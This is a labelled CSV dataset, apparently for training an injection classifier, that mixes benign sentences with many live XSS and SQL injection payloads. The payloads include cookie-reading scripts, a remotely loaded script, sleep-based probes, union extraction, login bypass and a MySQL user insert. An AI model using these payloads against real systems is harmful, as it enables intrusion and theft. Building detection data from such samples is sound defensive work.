"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meter id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></meter>",1,XSS,216 1'+ ( select 'wvqj' where 3709 = 3709,2,SQLi,19846 Where's the optometrist?,3,normal,23632 <noscript id=x tabindex=1 onfocus=alert(1)></noscript>,1,XSS,4803 Select venue.,3,normal,24547 "1 ) as zqxa where 5718 = 5718 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12599 Massage well into the area to be shaved and then select a really sharp razor.,3,normal,25892 "<template onkeydown=""alert(1)"" contenteditable>test</template>",1,XSS,3156 "-5798"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,10793 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( 'ootz' like 'ootz",2,SQLi,13265 "<div id=""x"">x</div> <xml:namespace prefix=""t""> <import namespace=""t"" implementation=""#default#time2""> <t:set attributeName=""innerHTML"" targetElement=""x"" to=""&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"">",1,XSS,108 "-3283 ) where 1948 = 1948 union all select 1948,1948,1948#",2,SQLi,17409 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#",2,SQLi,19163 "<strong onbeforecopy=""alert(1)"" contenteditable>test</strong>",1,XSS,3406 <blink onpointerdown=alert(1)>XSS</blink>,1,XSS,7719 "select * from users where id = 1 or "";["" or 1 = 1 -- 1",2,SQLi,17897 "1'+ ( select afst where 7454 = 7454 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) +'",2,SQLi,13372 1' ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ( 'npzh' = 'npzh,2,SQLi,14748 "1%' or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13664 <input onfocus=javascript:alert(1) autofocus>,1,XSS,6528 1 ) ) as oqyo where 7995 = 7995,2,SQLi,20452 "<li oncut=""alert(1)"" contenteditable>test</li>",1,XSS,6389 -1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A)),2,SQLi,19075 HAVING 1=0#,2,SQLi,22358 "1%"" ) and ( 6016 = 4763 ) *4763 and ( ""%"" = """,2,SQLi,18996 "<script\x2Ftype=""text/javascript"">javascript:alert(1);</script>",1,XSS,2978 "<style>@keyframes x{}</style><style style=""animation-name:x"" onanimationstart=""alert(1)""></style>",1,XSS,1530 "{""id"":null,""name"":""needle""}",3,normal,26796 "<div draggable=""true"" contenteditable>drag me</div><video ondragover=alert(1) contenteditable>drop here</video>",1,XSS,967 1' ) ) as kgfp where 2366 = 2366,2,SQLi,20344 "-5825 ) as mflf where 3999 = 3999 or make_set ( 1492 = 7153,7153 ) --",2,SQLi,16302 &#000060;,1,XSS,9857 "<style>@keyframes slidein {}</style><li style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></li>",1,XSS,457 OR x=y,2,SQLi,22537 "<a href=""javascript&colon;alert(1)"">XSS</a>",1,XSS,7056 "-2102' where 3644 = 3644 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10412 "UNION ALL SELECT 1,2,3,4,5,6,7",2,SQLi,20510 Select return.,3,normal,24641 Select a book for your bookshelf.,3,normal,24205 "1' ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13886 "<ol onmouseup=""alert(1)"">test</ol>",1,XSS,9289 "select * from users where id = 1 union select 1 1$,version ( ) -- 1",2,SQLi,16478 "1' ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12044 "end and ( ""vwbx"" = ""vwbx",2,SQLi,21186 1' in boolean mode ) or sleep ( 5 ) #,2,SQLi,19836 "1 ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 6829 = 6829",2,SQLi,14193 "1 where 3535 = 3535 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13043 "-6095"" ) ) as kgfp where 3601 = 3601 or 7287 = 9373#",2,SQLi,18209 "Select accessories with care to draw attention from trouble spots, such as funky jewelry and brightly colored scarves.",3,normal,25657 "{""id"":null,""name"":""soldier sky""}",3,normal,27161 -7277 ) ) ) order by 1#,2,SQLi,21352 "{""id"":null,""firstName"":""Anna"",""lastName"":""Tan"",""address"":""#02-266, 2019 Bukit Batok Street 23"",""city"":""750"",""telephone"":""247266292""}",3,normal,27327 -8248 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,13811 Robert Maxwell (1695-1765) was the author of Select Transactions of the Society of Improvers and was a great benefactor to Scottish agriculture.,3,normal,25748 1' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( 'lzbn' = 'lzbn,2,SQLi,15156 Plant some tall trees in your backyard.,3,normal,22987 Select a recipe to create in the kitchen.,3,normal,24141 Modify the recipe slightly.,3,normal,22557 "<applet onkeypress=""alert(1)"" contenteditable>test</applet>",1,XSS,3648 <br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>,1,XSS,502 Select your preferred flavor.,3,normal,24272 "( select ( case when ( 4232 = 4232 ) then ( select benchmark ( 5000000,md5 ( 0x6b637544 ) ) ) else 4232* ( select 4232 from mysql.db ) end ) )",2,SQLi,12235 &#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1),1,XSS,175 1'+ ( select 'vnue' where 5807 = 5807,2,SQLi,19829 <figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus>,1,XSS,2100 "exp/*<XSS STYLE='no\xss:noxss(""*//*"");",1,XSS,8530 "1 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) # cgow",2,SQLi,13367 "<nav onmouseover=""alert(1)"">test</nav>",1,XSS,8514 1'+ ( select mavu where 4276 = 4276 rlike sleep ( 5 ) #,2,SQLi,17759 "select * from users where id = 1 or 1#"", union select 1,version ( ) -- 1",2,SQLi,15949 "<style>@keyframes x{}</style><figure style=""animation-name:x"" onanimationend=""alert(1)""></figure>",1,XSS,1528 "<bdo onmouseout=""alert(1)"">test</bdo>",1,XSS,8594 I'm considering where to spend the weekend.,3,normal,23742 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( 'jutx' = 'jutx",2,SQLi,13604 "<div draggable=""true"" contenteditable>drag me</div><plaintext ondragover=alert(1) contenteditable>drop here</plaintext>",1,XSS,751 "<style>:target {transform: rotate(180deg);}</style><small id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></small>",1,XSS,613 "<samp onmousedown=""alert(1)"">test</samp>",1,XSS,8055 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5",2,SQLi,19071 "1 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,15534 "1' ) ) as ezpq where 2976 = 2976 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,14145 "-2365 ) ) union all select 8190,8190#",2,SQLi,19928 "select * from users where id = 1 or 1&@# = 1 union select 1,version ( ) -- 1",2,SQLi,15477 "<x 1=""1""onxxx=1",1,XSS,9809 "<form draggable=""true"" ondrag=""alert(1)"">test</form>",1,XSS,5177 1' where 9602 = 9602,2,SQLi,21750 "A select guide to cultural events for children, teenagers and families.",3,normal,26421 Select your favorite team.,3,normal,24319 select sleep ( 5 ) -- hlgt,2,SQLi,20964 <script>d.innerHTML+='';</script>,1,XSS,9390 "?goto,javascript:alert(1)"",",1,XSS,9660 "-5082 ) ) union all select 4013,4013,4013,4013,4013,4013,4013,4013,4013,4013#",2,SQLi,15451 "insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)",2,SQLi,11403 "<center onclick=""alert(1)"">test</center>",1,XSS,7839 "-2027%"" ) union all select 2048,2048,2048,2048,2048,2048,2048,2048#",2,SQLi,16491 &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera},1,XSS,2032 1 ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,17805 "admin"" #",2,SQLi,22477 ")) or benchmark(10000000,MD5(1))#",2,SQLi,20176 "<blink draggable=""true"" ondragend=""alert(1)"">test</blink>",1,XSS,4054 "1' ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 'fowu' like 'fowu",2,SQLi,12129 "<style>@keyframes slidein {}</style><dialog style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></dialog>",1,XSS,350 Up to 40% off Select Edible Spring Gardening and Hydroponic Supplies,3,normal,25215 <body onresize=alert(1)>press F12!,1,XSS,9297 1' ) and sleep ( 5 ),2,SQLi,21855 1 ) ) as nwyh where 7100 = 7100,2,SQLi,20486 This is what I called triangulation in my evidence to the Select Committee.,3,normal,25303 "1"" ) where 9545 = 9545 and 9198 = 9198--",2,SQLi,19542 <nextid id=x tabindex=1 onbeforeactivate=alert(1)></nextid>,1,XSS,3738 "1"" and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ""qzzg"" like ""qzzg",2,SQLi,12003 "1"" ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ""ikaf"" like ""ikaf",2,SQLi,13936 Join the discussion.,3,normal,22783 "<tfoot onkeydown=""alert(1)"" contenteditable>test</tfoot>",1,XSS,4262 "1"" and 4288 = 3696 and ""qqam"" like ""qqam",2,SQLi,19551 "><script+src=http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()""></script>",1,XSS,1564 Join fitness.,3,normal,23024 "<xmp draggable=""true"" ondrag=""alert(1)"">test</xmp>",1,XSS,5625 Please select a wedding band.,3,normal,24393 select ( case when ( 1946 = 1302 ) then 1946 else 1/ ( select 0 ) end ) --,2,SQLi,15733 "1%' ) ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13768 <head onfocusout=alert(1) tabindex=1 id=x></head><input autofocus>,1,XSS,2757 <ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus>,1,XSS,3214 "<shadow onmouseup=""alert(1)"">test</shadow>",1,XSS,7404 Where can we go?,3,normal,23484 Please select a wedding song.,3,normal,24416 He decided to order a vegetarian meal.,3,normal,22928 "1'+ ( select 'ndpx' where 4061 = 4061 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12080 Filter junk emails.,3,normal,22772 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16",2,SQLi,15169 <template id=x tabindex=1 onfocus=alert(1)></template>,1,XSS,4723 "<p oncontextmenu=""alert(1)"">test</p>",1,XSS,8838 "1' or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'ugum' like 'ugum",2,SQLi,12463 <blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus>,1,XSS,2271 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,11488 "<q onkeydown=""alert(1)"" contenteditable>test</q>",1,XSS,5967 "1%' and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and '%' = '",2,SQLi,11608 "1"" or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ""cgpm"" like ""cgpm",2,SQLi,10746 <font onpointerdown=alert(1)>XSS</font>,1,XSS,8257 "1'+ ( select vxax where 9036 = 9036 and elt ( 1210 = 1210,sleep ( 5 ) ) ) +'",2,SQLi,15552 -5569' ) as cjaf where 3753 = 3753 union all select 3753#,2,SQLi,17531 "1"" ) where 5870 = 5870 union all select null,null,null--",2,SQLi,17702 "<ruby draggable=""true"" ondragstart=""alert(1)"">test</ruby>",1,XSS,4098 "<canvas oncontextmenu=""alert(1)"">test</canvas>",1,XSS,6461 "1' ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( 'ggiw' = 'ggiw",2,SQLi,10429 Join group.,3,normal,23090 "<audio autoplay controls onpause=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1567 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#",2,SQLi,16645 1' in boolean mode ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) #,2,SQLi,16279 "<font onmouseenter=""alert(1)"">test</font>",1,XSS,7714 Delete unnecessary files from your computer.,3,normal,22921 -7874 ) ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 2817 = 2817,2,SQLi,10564 <iframe id=x onfocus=alert(1)>,1,XSS,9558 -2936 ) or 6872 = 6872,2,SQLi,21433 "1 where 4468 = 4468 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11280 I want to select a new phone for my dad.,3,normal,23872 It opens in select cities today and stars Helen Mirren.,3,normal,25963 <image3 onpointerover=alert(1)>XSS</image3>,1,XSS,7114 "1%' and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and '%' = '",2,SQLi,13362 "select * from users where id = 1 union select 1<@.,version ( ) -- 1",2,SQLi,16481 "Select the Twitch app and press ""A"" on your controller.3.",3,normal,25580 select @@version,2,SQLi,22117 "-4462%"" ) or 8571 = 8571--",2,SQLi,20981 <input3 onpointerdown=alert(1)>XSS</input3>,1,XSS,7279 "1"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""kzcd"" = ""kzcd",2,SQLi,11179 1'|| ( select 'flbv' where 7451 = 7451 and 4595 = 4595#,2,SQLi,17803 "1%"" ) ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13785 1'|| ( select 'yydv' from dual where 9639 = 9639,2,SQLi,18740 "-9142%"" ) ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""%"" = """,2,SQLi,10172 admin') or '1'='1'--,2,SQLi,21716 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec ( @q ),2,SQLi,15314 "![a](""onerror=""alert(1))",1,XSS,9726 "1"" union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,16201 1'+ ( select plhk where 6540 = 6540,2,SQLi,20084 "1"" ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( ""cowu"" like ""cowu",2,SQLi,15263 <script>%(payload)s</script>,1,XSS,9616 "<section onclick=""alert(1)"">test</section>",1,XSS,7466 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11",2,SQLi,17333 "<div/style=""width:expression(confirm(1))"">X</div> {IE7}",1,XSS,4424 1 ) as pyjx where 9005 = 9005,2,SQLi,20734 <q id=x tabindex=1 ondeactivate=alert(1)></q><input id=y autofocus>,1,XSS,2681 1' ) ) as pgif where 6346 = 6346,2,SQLi,20250 Sort beads.,3,normal,23050 Filter your email messages.,3,normal,22554 1 ) ) as dqfl where 7527 = 7527,2,SQLi,20458 1%' ) rlike ( select ( case when ( 1210 = 8664 ) then 1 else 0x28 end ) ) and ( '%' = ',2,SQLi,14832 1 ) and 8417 = 5276#,2,SQLi,21779 "<style>@keyframes x{}</style><meter style=""animation-name:x"" onanimationstart=""alert(1)""></meter>",1,XSS,1523 "1' ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,15335 Select a plant for your garden.,3,normal,24130 <object id=x tabindex=1 onactivate=alert(1)></object>,1,XSS,5032 "<figcaption onmouseleave=""alert(1)"">test</figcaption>",1,XSS,5013 1' where 2145 = 2145,2,SQLi,21813 select pg_sleep ( 5 ) # pjvi,2,SQLi,20802 "1%"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""%"" = """,2,SQLi,10743 "1%"" ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11982 <script>navigation.navigate('javascript:alert(1)')</script>,1,XSS,3593 select case when 8237 = 9948 then 1 else null end--,2,SQLi,18377 She'll select her engagement ring.,3,normal,24403 "<noframes oncut=""alert(1)"" contenteditable>test</noframes>",1,XSS,3907 "<a href=""\x16javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2448 <meter onpointerdown=alert(1)>XSS</meter>,1,XSS,7723 -7726 or 3038 = 3038,2,SQLi,21863 1'+ ( select 'yyyn' where 5395 = 5395,2,SQLi,19923 <dfn onpointerdown=alert(1)>XSS</dfn>,1,XSS,8587 1' ) where 5871 = 5871,2,SQLi,21405 "select * from users where id = 1 or ""{,"" = 1 or 1 = 1 -- 1",2,SQLi,17342 "<em onclick=""alert(1)"">test</em>",1,XSS,9419 <shadow onpointerdown=alert(1)>XSS</shadow>,1,XSS,7095 "1"" ) where 6236 = 6236 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,15607 "<div id=""96""><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>",1,XSS,2058 "{""id"":null,""firstName"":""Brandon"",""lastName"":""Lee"",""address"":""8573 Lincoln Blvd"",""city"":""142"",""telephone"":""2805490072""}",3,normal,27079 "-2110' or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11816 <abbr id=x tabindex=1 ondeactivate=alert(1)></abbr><input id=y autofocus>,1,XSS,2306 I want to select a book for my book club.,3,normal,23977 "<col draggable=""true"" ondragleave=""alert(1)"">test</col>",1,XSS,4555 -3062' ) ) or 6872 = 6872 and ( ( 'uzth' like 'uzth,2,SQLi,18322 "insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --",2,SQLi,14197 "1"" ) ) as ftts where 3671 = 3671 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10109 <set onpointerenter=alert(1)>XSS</set>,1,XSS,8390 <datalist onpointerup=alert(1)>XSS</datalist>,1,XSS,6597 "{""id"":null,""name"":""Staryu""}",3,normal,26838 "{""id"":null,""firstName"":""Zoey"",""lastName"":""Tam"",""address"":""1800 OLD TROY RD, UNION CITY TN 38261"",""city"":""397"",""telephone"":""5194477160""}",3,normal,26916 ">""><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>",1,XSS,5348 "<style>:target {transform: rotate(180deg);}</style><meta id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></meta>",1,XSS,643 <dir onpointerup=alert(1)>XSS</dir>,1,XSS,9094 "<b draggable=""true"" ondragstart=""alert(1)"">test</b>",1,XSS,5363 "1"" ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ""ejpw"" = ""ejpw",2,SQLi,15664 %253cscript%253ealert(document.cookie)%253c/script%253e,1,XSS,4429 -4954' ) or 8571 = 8571--,2,SQLi,21156 "<animate attributeName=""xlink:href"" begin=""0"" from=""javascript:alert(137)"" to=""&"" />",1,XSS,1898 ORDER BY 11--,2,SQLi,22234 1/*!1111'*/,2,SQLi,22411 <font style='color:expression(alert(document.cookie))'>,1,XSS,4431 "1' ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( 'tblb' = 'tblb",2,SQLi,12493 or 1=1--,2,SQLi,22485 1' ) as fyib where 9246 = 9246,2,SQLi,20602 "<footer onkeypress=""alert(1)"" contenteditable>test</footer>",1,XSS,3776 Select the colors.,3,normal,22851 "1 where 6100 = 6100 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11532 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frame id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></frame>",1,XSS,218 "<var onmouseover=""prompt(1)"">On Mouse Over</var>",1,XSS,5856 "<SCRIPT ="">"" SRC=""httx://xss.rocks/xss.js""></SCRIPT",1,XSS,5293 -7404' where 1536 = 1536 order by 1#,2,SQLi,19970 "1' ) ) as dtwh where 9633 = 9633 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11611 "1%' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( '%' = '",2,SQLi,11871 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ( 7946 = 7946",2,SQLi,13078 "<body BACKGROUND=""javascript:document.vulnerable=true;"">",1,XSS,4223 The Eurail Select Pass is the most flexible pass that allows you to choose countries to visit.,3,normal,25457 "1 ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 2868 = 2868",2,SQLi,10518 end and 'blit' = 'blit,2,SQLi,21399 Select fire.,3,normal,24671 Save $50 on select Bose headphones at Target See Details,3,normal,25735 "<style>@keyframes x{}</style><embed style=""animation-name:x"" onanimationend=""alert(1)""></embed>",1,XSS,1617 "{""id"":null,""firstName"":""Zhaodi"",""lastName"":""Chen"",""address"":""2094 Montour Blvd"",""city"":""468"",""telephone"":""2883324302""}",3,normal,27046 -3921' ) as audo where 7087 = 7087 or 1755 = 4937--,2,SQLi,18270 "><img src=x onerror=alert(String.fromCharCode(88,83,83));>",1,XSS,3975 &lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;,1,XSS,5862 "-2048 ) ) union all select 7054,7054,7054,7054,7054,7054,7054,7054,7054--",2,SQLi,15864 "1' ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )",2,SQLi,13783 1 ) ) and 7533 = 7533 and ( ( 8738 = 8738,2,SQLi,19373 <x oncut=alert()>x,1,XSS,9793 "Select Comfort — Select Comfort came in 11 cents a share above estimates, with quarterly profit of 56 cents per share.",3,normal,25643 %2A%7C,2,SQLi,22534 "exp/*<A STYLE='no\xss:noxss(""*//*"");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(""XSS""))'>",1,XSS,1805 Select mask.,3,normal,24694 "Investors seeking exposure to those sectors can get it through the Consumer Staples Select Sector SPDR Fund, the Vanguard Financials Index Fund, and the Utilities Select Sector SPDR Fund.",3,normal,25981 1'+ ( select mhfn where 2425 = 2425,2,SQLi,20092 "><script+src=https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)""></script>",1,XSS,1563 or sleep(__TIME__)#,2,SQLi,21911 Where's the parade?,3,normal,23592 "1"" ) ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( ""ugtw"" = ""ugtw",2,SQLi,14090 "<style>@keyframes x{}</style><ul style=""animation-name:x"" onanimationend=""alert(1)""></ul>",1,XSS,1789 ", exec ( 'sel' + 'ect us' + 'er' )",2,SQLi,20131 =1 or sleep(5)#,2,SQLi,9928 "-6561"" ) ) ) or 6872 = 6872 and ( ( ( ""azqp"" like ""azqp",2,SQLi,17758 "<xmp onmouseleave=""alert(1)"">test</xmp>",1,XSS,8138 "<style>:target {color: red;}</style><summary id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></summary>",1,XSS,774 "1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'rggg' = 'rggg",2,SQLi,10313 "1%"" ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15875 "1"" ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17307 Select study.,3,normal,24723 "<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>",1,XSS,3599 "<style>@keyframes slidein {}</style><ruby style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></ruby>",1,XSS,396 ) or '1'='1--,2,SQLi,22218 "<object src=1 href=1 onerror=""javascript:alert(1)""></object>",1,XSS,3429 "Contrary to the intent, the benefits skewed toward a select few companies in a select few industries.",3,normal,26270 <script>alert(document.head.childNodes[3].text)</script>,1,XSS,4404 "<kbd onkeypress=""alert(1)"" contenteditable>test</kbd>",1,XSS,4950 "<main onkeyup=""alert(1)"" contenteditable>test</main>",1,XSS,5127 "1%"" ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ""%"" = """,2,SQLi,14638 "1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) # tsxs",2,SQLi,13998 Where's the botanical garden?,3,normal,23595 following,3,normal,23241 "1"" union all select null,null,null--",2,SQLi,19986 "<tr onmouseover=""alert(1)"">test</tr>",1,XSS,8834 Choose fields where valid.,3,normal,23323 ; or '1'='1',2,SQLi,22290 "<iframe 